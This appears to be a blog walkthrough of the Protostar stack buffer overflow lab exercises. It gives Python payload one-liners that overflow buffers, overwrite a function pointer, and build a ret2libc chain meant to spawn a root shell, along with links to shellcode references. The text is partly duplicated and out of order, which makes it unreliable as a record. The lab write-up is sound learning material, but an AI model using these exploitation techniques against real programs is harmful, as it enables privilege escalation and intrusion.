The exercises deal with basics of Stack Overflow, you can read the following articles to know the basics
Before starting you the terminal given in the VM is obnoxious so I created a SSH forwarding from my local terminal
Stack0
This is the introductory exercise to introduce buffer overflow. Since the buffer size for input is 64 bytes, if you enter a string whose length is more than 64 bytes you are able toe overflow the buffer and rewrite the modified variable.
Stack1
In this case in addition to overflowing the value you have to input a specific value, in little endian format the LSB is stored at the starting addresss
In the bash shell you can use the export command to set the environment variable,
Here, 'fp' is a function pointer. We want to change the address of the fp to that of win() .
Stack4
From gdb you can find the address of ebp register using
info frame
and find the address of the buffer using
Now you can create the appropriate payload
Stack5
This exercise requires us to inject shellcode using a payload. You can check that the binary is suid.
https://www.exploit-db.com/exploits/13357/
Stack6
This tutorial covers this exercise very nicely you can read it.
https://exploit.ph/x86-32-linux/2014/08/06/ret2libc-and-rop/
No I construct my payload to be
python -c "print 'a'*80 + '\xb0\xff\xec\xb7' +'a'*4+ '\xab\xf9\xff\xbf'" > /tmp/680
To avoid the segmentation fault error replace the four 'a' with address of exit system call.
python -c "print 'a'*80 + '\xb0\xff\xec\xb7' + '\xc0\x60\xec\xb7'+ '\xab\xf9\xff\xbf'" > /tmp/680
Here, the address of env variable is not the same when using with binary, so after hit an trial I got the correct address. But still the program exits without spawning the shell
Stack7
Before starting you the terminal given in the VM is obnoxious so I created a SSH forwarding from my local terminal
VBoxManage modifyvm <myserver> --natpf1 "ssh,tcp,,3022,,22"ssh -p 3022 <user>@172.0.0.1 Stack0
This is the introductory exercise to introduce buffer overflow. Since the buffer size for input is 64 bytes, if you enter a string whose length is more than 64 bytes you are able toe overflow the buffer and rewrite the modified variable.
Stack1
In this case in addition to overflowing the value you have to input a specific value, in little endian format the LSB is stored at the starting addresss
./stack1 $(python -c "print 'a'*64 + '\x64\x63\x62\x61'")Stack2
In the bash shell you can use the export command to set the environment variable,
Stack3
export GREENIE=$(python -c "print 'a'*64 + '\x0a\x0d\x0a\x0d")
Here, 'fp' is a function pointer. We want to change the address of the fp to that of win() .
objdump -d ./stack3generates the object file for the executable from where we can find the address of win() .
python -c "print 'a'*64 + '\x24\x84\x04\x08'" > /tmp/stack3./stack3 < /tmp/stack3
Stack4
From gdb you can find the address of ebp register using
info frame
and find the address of the buffer using
p &bufferThe return address is stored after the %ebp , find the address of win() by using
p win
Now you can create the appropriate payload
Stack5
This exercise requires us to inject shellcode using a payload. You can check that the binary is suid.
https://www.exploit-db.com/exploits/13357/
Stack6
This tutorial covers this exercise very nicely you can read it.
https://exploit.ph/x86-32-linux/2014/08/06/ret2libc-and-rop/
I am going to try a different approach. Here, we are to use the Ret2libc attack with system call
A good tutorial is here https://www.exploit-db.com/docs/17131.pdf ,https://www.exploit-db.com/docs/28553.pdf
Now, I find the address of the system() libc call using
Print system = 0xb7ecffb0
This will not get caught in the if check and will allow the function to return. Now, I need to find the amount of string to overlfow the hte return address of the binary.
80 bytes will get the overflow to work. Now, I need to find the address of the string /bin/bash
0xbffff9ab: "/bin/bash" in the environment variables, I get by searching all the strings in the stack. Somewhere the env variables must be kept. No I construct my payload to be
python -c "print 'a'*80 + '\xb0\xff\xec\xb7' +'a'*4+ '\xab\xf9\xff\xbf'" > /tmp/680
To avoid the segmentation fault error replace the four 'a' with address of exit system call.
python -c "print 'a'*80 + '\xb0\xff\xec\xb7' + '\xc0\x60\xec\xb7'+ '\xab\xf9\xff\xbf'" > /tmp/680
Here, the address of env variable is not the same when using with binary, so after hit an trial I got the correct address. But still the program exits without spawning the shell
Stack7
No comments:
Post a Comment